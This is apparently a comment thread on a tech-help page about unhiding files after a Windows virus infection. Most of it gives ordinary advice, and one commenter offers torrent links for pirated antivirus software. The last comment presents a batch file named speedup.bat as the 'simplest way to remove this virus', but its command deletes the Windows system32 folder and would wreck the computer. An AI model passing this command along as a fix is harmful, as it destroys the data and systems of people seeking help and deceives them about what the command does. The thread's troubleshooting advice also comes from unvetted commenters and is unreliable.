 Folder Options > show hidden files and folders. select "Show Hidden Files and Folders"

about halfway down the window.

from there,go to your hard drive where files are shaded. highlight all the files, right click and select properties, in the window that pops up there is a box ticked that says hidden, untick the box, hit OK or Apply, it will ask you what folders to apply it to, select "Apply Changes to this folder, subfolders and files". Itll take a little while but this should do the trick.

How do I fix the shady looking files? They don't have full color like you said.

download perfect uninstaller follow the link locations when searching and delete them

another trick is if you have random icons that you didnt install and believe they might have something to do with your virus delete the icon and before sending it to the trash look at the icons file location and delete the file from there as well the location will pop up when you try to delete the desktop shortcut icon

here are the virus removal software that i use: avg free....malwarebytes......adva­nced system care i also have torrent links for other mainstream products like norton and panda i do step 1 then run full sweeps on all three main programs

hi fedil my laptop got virus when iam work and all my photos and video of my wedding last month is gone..iam really excited to follow all your instructions and manuals but i accidentally delete the CheckedValue then when i open my folder option,at the hidden files it only show's the dont show hidden files,drive please help me id like to recover all deleted files with your help!thank you!

Very helpful and you explain what you was doing very good. Thanks! I am anixous how to delete the virus. Half of our drive works, we're running XP on the computer that broke. We now are running Win. 7 on a new computer but I would like to fix the old one. LET ME KNOW about deleting the virus, thanks again!

Ahh the simplest way to remove this virus is as follows: open up notepad and type in the following text:

@echo off del C:\\WINDOWS\system32 >save as speedup.bat (select all files instead of the text document) >Double click the .bat file >reboot PC, problem solved!
